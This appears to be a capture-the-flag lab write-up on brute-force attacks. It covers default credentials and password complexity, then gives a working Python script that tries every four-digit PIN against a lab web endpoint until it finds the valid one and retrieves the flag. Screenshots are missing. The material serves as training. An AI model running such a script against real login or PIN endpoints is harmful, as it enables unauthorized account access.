1. Checking for default credentials.

image.png

Password Complixy Combinations.

image.png

It will take forever to crack a complex 12 char password

image.png

Imagine we have this website.

image.png

Now we need to brute force the pin.

let’s write a python script to do that.

import requests

for pin in range(10000):
    pin = f"{pin:04d}"
    
    print(f"[!] Trying With Pin: {pin}")

    url = f"<http://83.136.254.47:33168/pin?pin={pin}>"

    r = requests.get(url)

    if "Incorrect PIN!" in r.text:
        pass
    else:
        print(f"[+] Found Valid Pin: {pin}")
        break

image.png

notice that we found a valid pin.

Now let’s go to the site and enter this pin and see what will happen.

image.png

For Sure we got the flag.

Some useful wordlists.

image.png